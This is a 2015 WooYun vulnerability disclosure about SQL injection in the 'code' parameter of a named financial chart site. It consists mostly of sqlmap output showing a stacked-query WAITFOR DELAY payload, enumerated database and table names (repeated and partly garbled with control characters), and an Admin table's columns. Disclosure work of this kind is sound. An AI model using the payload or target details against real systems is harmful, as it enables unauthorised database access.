当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113331

漏洞标题:上海通乾投资股份有限公司某站点SQL注入

相关厂商:上海通乾投资股份有限公司

漏洞作者: Lonely

提交时间:2015-05-13 19:01

修复时间:2015-06-27 19:02

公开时间:2015-06-27 19:02

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT ....似乎人家不重视

详细说明:

注入点:http://www.gold678.com/chart/WH.aspx?code=

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: code (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: code=';WAITFOR DELAY '0:0:5'--
---
[23:45:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:45:25] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r.PC-20150414JQWW\.sqlmap\output\www.gold678.com'

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: code (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: code=';WAITFOR DELAY '0:0:5'--
---
[23:49:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:49:12] [INFO] fetching database names
[23:49:12] [INFO] fetching number of databases
[23:49:12] [INFO] resumed: 10
[23:49:12] [INFO] resumed: htchartbank
[23:49:12] [INFO] resumed: htweb
[23:49:12] [INFO] resumed: master
[23:49:12] [INFO] resumed: model
[23:49:12] [INFO] resumed: msdb
[23:49:12] [INFO] resumed: ReportServer
[23:49:12] [INFO] resumed: ReportServerTempDB
[23:49:12] [INFO] resumed: Sharetrader
[23:49:12] [INFO] resumed: tempdb
[23:49:12] [INFO] resumed: zzbz
available databases [10]:
[*] htchartbank
[*] htweb
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] Sharetrader
[*] tempdb
[*] zzbz
[23:49:12] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r.PC-20150414JQWW\.sqlmap\output\www.gold678.com'


900多个表 也是醉了
<code>web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database: 'htchartbank'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: htchartbank
[952 tables]
+--------------------------------------------+
| Admin |
| AspNet_SqlCacheTablesForChangeNotification |
| DAY1000 |
| DAY1001 |
| DAY1002 |
| DAY1003 |
| DAY1004 |
| DAY1213 |
| DAY1214 |
| DAY1215 |
| DAY1229 |
| DAY1238 |
| DAY1327 |
| DAY1400 |
| DAY1415 |
| DAY1428 |
| DAY1513 |
| DAY2913 |
| DAY2914 |
| DAY2915 |
| DAY2938 |
| DAY3501 |
| DAY3814 |
| DAY3827 |
| DAY3829 |
| DAY4001 |
| DAY4002 |
| DAY4004 |
| DAY4005 |
| DAY4006 |
| DAY4008 |
| DAY4009 |
| DAY4011 |
| DAY4020 |
| DAY4021 |
| DAY5001 |
| DAY5002 |
| DAY9501 |
| DAY9514AA |
| DAYDINIW |
| Day4014 |
| MIN1000 |
| MIN1001 |
| MIN1002 |
| MIN1003 |
| MIN1004 |
| MIN1005 |
| MIN1006 |
| MIN1007A |
| MIN1009 |
| MIN1213 |
| MIN1214 |
| MIN1215 |
| MIN1229 |
| MIN1238 |
| MIN1327 |
| MIN1400 |
| MIN1415 |
| MIN1427A |
| MIN1428 |
| MIN1513 |
| MIN1527 |
| MIN2913 |
| MIN2914 |
| MIN2915 |
| MIN2938 |
| MIN301003 |
| MIN301004 |
| MIN301214 |
| MIN301215 |
| MIN301233 |
| MIN301238 |
| MIN301327 |
| MIN301400 |
| MIN301413 |
| MIN301415 |
| MIN301427 |
| MIN301428 |
| MIN301513 |
| MIN301527 |
| MIN302913 |
| MIN302914 |
| MIN302915 |
| MIN302938 |
| MIN302977 |
| MIN303414 |
| MIN303501 |
| MIN303813 |
| MIN303815 |
| MIN30381A |
| MIN303827 |
| MIN303829 |
| MIN304001 |
| MIN304002 |
| MIN304003 |
| MIN304004 |
| MIN3040051 |
| MIN304006 |
| MIN304007 |
| MIN304008 |
| MIN304009 |
| MIN304010 |
| MIN304011 |
| MIN304020 |
| MIN304021 |
| MIN305002 |
| MIN309501 |
| MIN309514 |
| MIN30DINIW |
| MIN3414 |
| MIN3501 |
| MIN3814 |
| MIN3815 |
| MIN3827 |
| MIN391227 |
| MIN4001 |
| MIN4002 |
| MIN4004 |
| MIN4005 |
| MIN4006 |
| MIN4007 |
| MIN4008 |
| MIN4009 |
| MIN4010 |
| MIN4011 |
| MIN4020 |
| MIN4020 |
| MIN5002 |
| MIN9227 |
| MIN9501 |
| MIN9514 |
| MIQ1413 |
| MMNDINIW |
| Mindex |
| ZHMessage |
| DAY1227\x05 |
| DAY1427# |
| DAY2414\t |
| DAY2927\x03\x0f |
| DAY3813\r\x0f |
| DAY3815\x0e |
| DAY4000\t |
| DAY4003\x11 |
| DAY4007! |
| DA1527 |
| DA_1413\x11 |
| Day9812% |
| MIN1008\t |
| MIN2927! |
| MIN301002\tA |
| MIN301229\r |
| MIN305001\t |
| MIN3929! |
| MIN4003\x02 |
| MIN5001\x03 |
| MINAaD\x05A |
| MIn301228\x11 |
| codetable\x11 |
| day1821! |
| day1821! |
| day2713! |
| day282< |
| day2918\x03 |
| day2921\x04\x03 |
| dayniciw\t\x03 |
| min101418! |
| min101421\x11 |
| min101e21\x02 |
| min103414\x11 |
| min103821\x11 |
| min104005\x05 |
| min151238\t |
| min151527\x03 |
| min151528\x05 |
| min152918\t\x02 |
| min152928! |
| min153414\x19 |
| min154002\x11 |
| min154010! |
| min154014! |
| min1813\x07\x0b |
| min2713\x02a |
| min51218\x03\x19 |
| min51221\x05 |
| min52827\x11 |
| min52915!\x11 |
| min603829\x03 |
| min604002\x02! |
| min604006\t |
| min604009\x05 |
| min604014\x03 |
| min605001\r |
| min901218\x03 |
| min901238\x03 |
| min901527\x11 |
| min902127\x11\x07 |
| min902821\x02 |
| min903514\x11 |
| min903812\t\x02 |
| min904020\x02 |
| minniciw\r |
| month1410\x02 |
| month1413! |
| month1518\x11 |
| month3815\x05 |
| month382; |
| month4011\x07 |
| monthiniw! |
| realmarket-3 |
| tik1428\x11 |
| tik2815\t |
| tik2918\x02a |
| tik2928\x03 |
| tik2:12 |
| tik3815\x11 |
| tik4004! |
| tik4010\x03 |
| tik5004\t |
| week1418\t |
| week1527\t\t |
| week2713! |
| week2927\t |
| week3813\x03 |
| week3815\x11 |
| week3827\t |
| week4002\x04 |
| weekiniw\x05 |
| year1221\x02 |
| year2813!\r |
| year2821\x19 |
| year2914\x11 |
| year3815\x08! |
| year3818\x02 |
| year4010\x03\x03 |
| year4011\x05 |
| yearindiw\x02 |
| day1221 |
| day1228 |
| day1318 |
| day1321 |
| day1410 |
| day1491 |
| day1498 |
| day1518 |
| day1521 |
| day1528 |
| day1813 |
| day2127 |
| day2813 |
| day2818A |
| day2821 |
| day2928 |
| day3818 |
| day3821 |
| day3829 |
| dayindiw |
| dayiniw |
| dayndiw |
| daynqci |
| dqyiciw |
| dtproperties |
| gpindex |
| gpindex_sz95559 |
| mIN3813 |
| min101000 |
| min101213 |
| min101214 |
| min101215 |
| min101218 |
| min101221 |
| min101227 |
| min101228 |
| min101229 |
| min101238 |
| min101327 |
| min101410 |
| min101413 |
| min101415 |
| min101427 |
| min101427 |
| min101513 |
| min101518 |
| min101521 |
| min101527 |
| min101528 |
| min101813 |
| min101821 |
| min101828 |
| min102127 |
| min102713 |
| min102813 |
| min102818 |
| min102827 |
| min102831 |
| min102913 |
| min102914a |
| min102915 |
| min102918 |
| min102921 |
| min102927 |
| min102928 |
| min102938 |
| min103029 |
| min103501 |
| min103812 |
| min103813 |
| min103814 |
| min103815 |
| min103818 |
| min103821 |
| min103828 |
| min103829 |
| min104001 |
| min104002 |
| min104003 |
| min104004 |
| min104006 |
| min104007 |
| min104008 |
| min104009 |
| min104010 |
| min104011 |
| min104014 |
| min104020 |
| min104022 |
| min105001 |
| min105002 |
| min109501 |
| min109514 |
| min10diniw |
| min10indiw |
| min10niciw |
| min10nqci |
| min1218 |
| min1221 |
| min1228 |
| min1321 |
| min1410 |
| min1418 |
| min1421 |
| min151000 |
| min151213 |
| min151214 |
| min151215 |
| min151218 |
| min151221 |
| min151227 |
| min151228 |
| min151229 |
| min151321 |
| min151327 |
| min151410 |
| min151413 |
| min151415 |
| min151418A |
| min151421 |
| min151421 |
| min151428 |
| min151513 |
| min151518 |
| min151521 |
| min1518 |
| min151813 |
| min151821 |
| min151827 |
| min1521 |
| min152127 |
| min152713 |
| min1528 |
| min152813 |
| min152818 |
| min152821 |
| min152827 |
| min152913 |
| min152914 |
| min152915 |
| min152921 |
| min152927 |
| min152938 |
| min153029 |
| min153501 |
| min153811 |
| min153812 |
| min153813 |
| min153814 |
| min153815 |
| min153818 |
| min153827 |
| min153828 |
| min153829 |
| min154002 |
| min154003 |
| min154004 |
| min154004A |
| min154006 |
| min154007 |
| min154008 |
| min154009 |
| min154011 |
| min154020 |
| min154021 |
| min155001 |
| min155002 |
| min155501 |
| min159514G |
| min15diniw |
| min15indiw |
| min15nqciw |
| min15nqciw |
| min1821 |
| min1827 |
| min2127A |
| min2713 |
| min2818 |
| min2821 |
| min2827 |
| min2921 |
| min2928 |
| min29Q8 |
| min301000 |
| min301001 |
| min301218 |
| min301221 |
| min301321 |
| min301410A |
| min301418 |
| min301421 |
| min301518 |
| min301521 |
| min301528 |
| min301813 |
| min301821 |
| min301827 |
| min302127 |
| min302713 |
| min302813 |
| min302818 |
| min302821 |
| min302827 |
| min3029 |
| min302918 |
| min302921 |
| min302928 |
| min303029 |
| min303812 |
| min303818 |
| min303821 |
| min303828 |
| min304014 |
| min30indiw |
| min30niciw |
| min30nqci |
| min3812 |
| min3818 |
| min3821 |
| min3828 |
| min401A |
| min51213 |
| min51214 |
| min51215 |
| min51227 |
| min51228 |
| min51229 |
| min51238 |
| min51321 |
| min51327 |
| min51410 |
| min51413 |
| min51415 |
| min51418 |
| min51427 |
| min51428 |
| min514A1 |
| min51513 |
| min51518 |
| min51521 |
| min51527 |
| min51528 |
| min51813 |
| min51821 |
| min51827 |
| min52127 |
| min52713 |
| min52813 |
| min52818 |
| min52821 |
| min52913 |
| min52914 |
| min52918 |
| min52921 |
| min52927 |
| min52928 |
| min52938 |
| min53029 |
| min53414 |
| min53501 |
| min53812 |
| min53813 |
| min53814 |
| min53815 |
| min53818 |
| min53821 |
| min53827 |
| min53828 |
| min53829 |
| min54001 |
| min54002 |
| min54003 |
| min54004 |
| min54005 |
| min54006 |
| min54007 |
| min54008 |
| min54009 |
| min54010 |
| min54011 |
| min54014 |
| min54020 |
| min54021 |
| min55001 |
| min55002 |
| min59501 |
| min59514 |
| min5diniw |
| min5indiw |
| min5niciw |
| min5nqci |
| min601000 |
| min601213 |
| min601214 |
| min601215 |
| min601218 |
| min601221 |
| min601227 |
| min601228 |
| min601229 |
| min601238 |
| min601321 |
| min601327 |
| min601410 |
| min601413 |
| min601415 |
| min601418 |
| min601421 |
| min601427 |
| min601428 |
| min601513 |
| min601518 |
| min601521 |
| min601527 |
| min601528 |
| min601813 |
| min601821 |
| min601827 |
| min602127 |
| min602713 |
| min602813 |
| min602818 |
| min602821 |
| min602827 |
| min602913 |
| min602914 |
| min602915 |
| min602918 |
| min602921 |
| min602927 |
| min602928 |
| min602938 |
| min603414 |
| min603501 |
| min603812 |
| min603813A |
| min603814 |
| min603815 |
| min603818 |
| min603821 |
| min603827 |
| min603828 |
| min604001 |
| min604003 |
| min604004 |
| min604005 |
| min604007 |
| min604008 |
| min604010 |
| min604011 |
| min604020 |
| min604021 |
| min605002 |
| min609514 |
| min60A501 |
| min60diniw |
| min60indiw |
| min60niciw |
| min60nqci |
| min61000 |
| min901000 |
| min901213 |
| min901214 |
| min901215A |
| min901221 |
| min901227 |
| min901228 |
| min901229 |
| min901321 |
| min901321A |
| min901410 |
| min901413 |
| min901415 |
| min901418 |
| min901427 |
| min901428 |
| min901431 |
| min901513 |
| min901518 |
| min901521 |
| min901527 |
| min901813 |
| min901821 |
| min901827 |
| min902713 |
| min902713 |
| min902818 |
| min902827 |
| min902913 |
| min902914 |
| min902915 |
| min902918 |
| min902921 |
| min902927 |
| min902928 |
| min902938 |
| min903414 |
| min903501 |
| min903813 |
| min903814 |
| min903815 |
| min903818 |
| min903821 |
| min903827 |
| min903828 |
| min903829 |
| min904001 |
| min904002 |
| min904003 |
| min904004 |
| min904005 |
| min904006 |
| min904007 |
| min904008 |
| min904009 |
| min904010 |
| min904011 |
| min904014 |
| min904021 |
| min905001 |
| min905002 |
| min909501 |
| min909514 |
| min90diniw |
| min90indiw |
| min90niciw |
| min90nqci |
| mindex_viewA |
| minindqwA |
| minnqci |
| month1000 |
| month1013 |
| month1214 |
| month1215 |
| month1218 |
| month1221 |
| month1227 |
| month1228 |
| month1229 |
| month1238 |
| month1321 |
| month1327 |
| month1415 |
| month1418 |
| month1421 |
| month1427 |
| month1428 |
| month1513 |
| month1521 |
| month1527 |
| month1528 |
| month1813 |
| month1821 |
| month1827 |
| month2127 |
| month2713 |
| month2818 |
| month2821 |
| month2827 |
| month2893 |
| month2913 |
| month2914 |
| month2915 |
| month2918 |
| month2921A |
| month29271 |
| month2928 |
| month2938A |
| month3414 |
| month3501 |
| month3812 |
| month3813 |
| month3814 |
| month3818 |
| month3821 |
| month3827 |
| month3828 |
| month4001 |
| month4002A |
| month4003 |
| month4004 |
| month4005 |
| month4006 |
| month4007 |
| month4008 |
| month4009 |
| month4010 |
| month4014 |
| month4020 |
| month4021A |
| month5001 |
| month5002 |
| month9501 |
| month9514 |
| monthdiniw |
| monthindiw |
| monthisiw |
| monthndiw |
| monthniciw |
| monthnqci |
| orderGP |
| realmarket |
| realmarketIndex |
| realview |
| setinfo |
| sqlmapoutput |
| tablecount |
| tik1000 |
| tik1081 |
| tik1082 |
| tik1210 |
| tik1213 |
| tik1214 |
| tik1215 |
| tik1218 |
| tik1221 |
| tik1227 |
| tik1228 |
| tik1229 |
| tik1238 |
| tik1310 |
| tik1312 |
| tik1321 |
| tik1327 |
| tik1410 |
| tik1413 |
| tik1415 |
| tik1418 |
| tik1421 |
| tik1427 |
| tik1482 |
| tik1513 |
| tik1518 |
| tik1521 |
| tik1527 |
| tik1528 |
| tik1813 |
| tik1821 |
| tik1827 |
| tik2127 |
| tik2710 |
| tik2713 |
| tik2813 |
| tik2818 |
| tik2821 |
| tik2827 |
| tik2913 |
| tik2914 |
| tik2915 |
| tik2921 |
| tik2927 |
| tik2938 |
| tik2940 |
| tik3029 |
| tik3414 |
| tik3501 |
| tik3810 |
| tik3812 |
| tik3813 |
| tik3814 |
| tik3818 |
| tik3821 |
| tik3827 |
| tik3828 |
| tik3829 |
| tik4000A |
| tik4001 |
| tik4002 |
| tik4011 |
| tik4014 |
| tik5001 |
| tik5001 |
| tik8714 |
| tik8727 |
| tik8888 |
| tik9501 |
| tik9514 |
| tikdiniw |
| tikliciw |
| tiklndiwA |
| tiknqciA |
| tikrckiw |
| tiks1ciw |
| tiks4ciw |
| tikspciw |
| waihui6 |
| week1000 |
| week1213 |
| week1213 |
| week1215 |
| week1218 |
| week1221 |
| week1227 |
| week1228 |
| week1229 |
| week1238 |
| week1321 |
| week1327 |
| week1410 |
| week1413 |
| week1415 |
| week1421 |
| week1427 |
| week1428 |
| week1513 |
| week1518 |
| week1521 |
| week1528 |
| week1813 |
| week1821 |
| week1827 |
| week2127 |
| week2813 |
| week2818 |
| week2821 |
| week2827 |
| week2913 |
| week2914 |
| week2915 |
| week291I |
| week2921 |
| week2928 |
| week2938 |
| week3414 |
| week3501 |
| week3812 |
| week3814 |
| week3818 |
| week3821 |
| week3828 |
| week3829 |
| week4001 |
| week4003 |
| week4004 |
| week4005 |
| week4006 |
| week4006 |
| week4008 |
| week4009 |
| week4010 |
| week4011 |
| week4014 |
| week4020 |
| week4021 |
| week5001 |
| week5002 |
| week9501 |
| week9514 |
| weekdiniw |
| weekiciw |
| weekindiw |
| weekndiw |
| weeknici |
| weekniciw |
| wtablename |
| year1000 |
| year1213 |
| year1214 |
| year1215 |
| year1218 |
| year1227 |
| year1228 |
| year1229 |
| year1238 |
| year1321 |
| year1327 |
| year1410 |
| year1413 |
| year1415 |
| year1418 |
| year1421 |
| year1427 |
| year1428 |
| year1514 |
| year1518 |
| year1521 |
| year1527 |
| year1528 |
| year1813 |
| year1821 |
| year1827 |
| year2127 |
| year2713 |
| year2818 |
| year2827 |
| year2913 |
| year2915 |
| year2918 |
| year2921 |
| year2927 |
| year2928 |
| year2928 |
| year3414 |
| year3501 |
| year3812 |
| year3813 |
| year3814 |
| year3818 |
| year3827 |
| year3828 |
| year3829 |
| year4001 |
| year4001 |
| year4002 |
| year4004 |
| year4014A |
| year5002 |
| year9501 |
| year9514 |
| year9iniw |
| yeariciw |
| yeariniw |
| yearndiw |
| yearniciw |
| yearnqci |
| 퍾鱧 |
+--------------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: htchartbank
Table: Admin
[3 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| id | int |
| password | varchar |
| username | varchar |
+----------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: htchartbank
Table: Admin
[0 entries]
+----+----------+----------+
| id | username | password |
+----+----------+----------+
+----+----------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:6'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:6'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] htchartbank
[*] htweb
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] Sharetrader
[*] tempdb
[*] zzbz
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:6'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:6'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:6'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: code=';WAITFOR DELAY '0:0:6'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: htchartbank
[952 tables]
+--------------------------------------------+
| Admin |
| AspNet_SqlCacheTablesForChangeNotification |
| DAY1000 |
| DAY1001 |
| DAY1002 |
| DAY1003 |
| DAY1004 |
| DAY1213 |
| DAY1214 |
| DAY1215 |
| DAY1229 |
| DAY1238 |
| DAY1327 |
| DAY1400 |
| DAY1415 |
| DAY1428 |
| DAY1513 |
| DAY2913 |
| DAY2914 |
| DAY2915 |
| DAY2938 |
| DAY3501 |
| DAY3814 |
| DAY3827 |
| DAY3829 |
| DAY4001 |
| DAY4002 |
| DAY4004 |
| DAY4005 |
| DAY4006 |
| DAY4008 |
| DAY4009 |
| DAY4011 |
| DAY4020 |
| DAY4021 |
| DAY5001 |
| DAY5002 |
| DAY9501 |
| DAY9514AA |
| DAYDINIW |
| Day4014 |
| MIN1000 |
| MIN1001 |
| MIN1002 |
| MIN1003 |
| MIN1004 |
| MIN1005 |
| MIN1006 |
| MIN1007A |
| MIN1009 |
| MIN1213 |
| MIN1214 |
| MIN1215 |
| MIN1229 |
| MIN1238 |
| MIN1327 |
| MIN1400 |
| MIN1415 |
| MIN1427A |
| MIN1428 |
| MIN1513 |
| MIN1527 |
| MIN2913 |
| MIN2914 |
| MIN2915 |
| MIN2938 |
| MIN301003 |
| MIN301004 |
| MIN301214 |
| MIN301215 |
| MIN301233 |
| MIN301238 |
| MIN301327 |
| MIN301400 |
| MIN301413 |
| MIN301415 |
| MIN301427 |
| MIN301428 |
| MIN301513 |
| MIN301527 |
| MIN302913 |
| MIN302914 |
| MIN302915 |
| MIN302938 |
| MIN302977 |
| MIN303414 |
| MIN303501 |
| MIN303813 |
| MIN303815 |
| MIN30381A |
| MIN303827 |
| MIN303829 |
| MIN304001 |
| MIN304002 |
| MIN304003 |
| MIN304004 |
| MIN3040051 |
| MIN304006 |
| MIN304007 |
| MIN304008 |
| MIN304009 |
| MIN304010 |
| MIN304011 |
| MIN304020 |
| MIN304021 |
| MIN305002 |
| MIN309501 |
| MIN309514 |
| MIN30DINIW |
| MIN3414 |
| MIN3501 |
| MIN3814 |
| MIN3815 |
| MIN3827 |
| MIN391227 |
| MIN4001 |
| MIN4002 |
| MIN4004 |
| MIN4005 |
| MIN4006 |
| MIN4007 |
| MIN4008 |
| MIN4009 |
| MIN4010 |
| MIN4011 |
| MIN4020 |
| MIN4020 |
| MIN5002 |
| MIN9227 |
| MIN9501 |
| MIN9514 |
| MIQ1413 |
| MMNDINIW |
| Mindex |
| ZHMessage |
| DAY1227 |
| DAY1427# |
| DAY2414 |
| DAY2927 |
| DAY3813
|
| DAY3815 |
| DAY4000 |
| DAY4003 |
| DAY4007! |
| DA1527 |
| DA_1413 |
| Day9812% |
| MIN1008 |
| MIN2927! |
| MIN301002 A |
| MIN301229
|
| MIN305001 |
| MIN3929! |
| MIN4003 |
| MIN5001 |
| MINAaDA |
| MIn301228 |
| codetable |
| day1821! |
| day1821! |
| day2713! |
| day282< |
| day2918 |
| day2921 |
| dayniciw |
| min101418! |
| min101421 |
| min101e21 |
| min103414 |
| min103821 |
| min104005 |
| min151238 |
| min151527 |
| min151528 |
| min152918 |
| min152928! |
| min153414 |
| min154002 |
| min154010! |
| min154014! |
| min1813 |
| min2713a |
| min51218 |
| min51221 |
| min52827 |
| min52915! |
| min603829 |
| min604002! |
| min604006 |
| min604009 |
| min604014 |
| min605001
|
| min901218 |
| min901238 |
| min901527 |
| min902127 |
| min902821 |
| min903514 |
| min903812 |
| min904020 |
| minniciw
|
| month1410 |
| month1413! |
| month1518 |
| month3815 |
| month382; |
| month4011 |
| monthiniw! |
| realmarket-3 |
| tik1428 |
| tik2815 |
| tik2918a |
| tik2928 |
| tik2:12 |
| tik3815 |
| tik4004! |
| tik4010 |
| tik5004 |
| week1418 |
| week1527 |
| week2713! |
| week2927 |
| week3813 |
| week3815 |
| week3827 |
| week4002 |
| weekiniw |
| year1221 |
| year2813!
|
| year2821 |
| year2914 |
| year3815! |
| year3818 |
| year4010 |
| year4011 |
| yearindiw |
| day1221 |
| day1228 |
| day1318 |
| day1321 |
| day1410 |
| day1491 |
| day1498 |
| day1518 |
| day1521 |
| day1528 |
| day1813 |
| day2127 |
| day2813 |
| day2818A |
| day2821 |
| day2928 |
| day3818 |
| day3821 |
| day3829 |
| dayindiw |
| dayiniw |
| dayndiw |
| daynqci |
| dqyiciw |
| dtproperties |
| gpindex |
| gpindex_sz95559 |
| mIN3813 |
| min101000 |
| min101213 |
| min101214 |
| min101215 |
| min101218 |
| min101221 |
| min101227 |
| min101228 |
| min101229

修复方案:

你们更专业 有礼物?

版权声明:转载请注明来源 Lonely@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝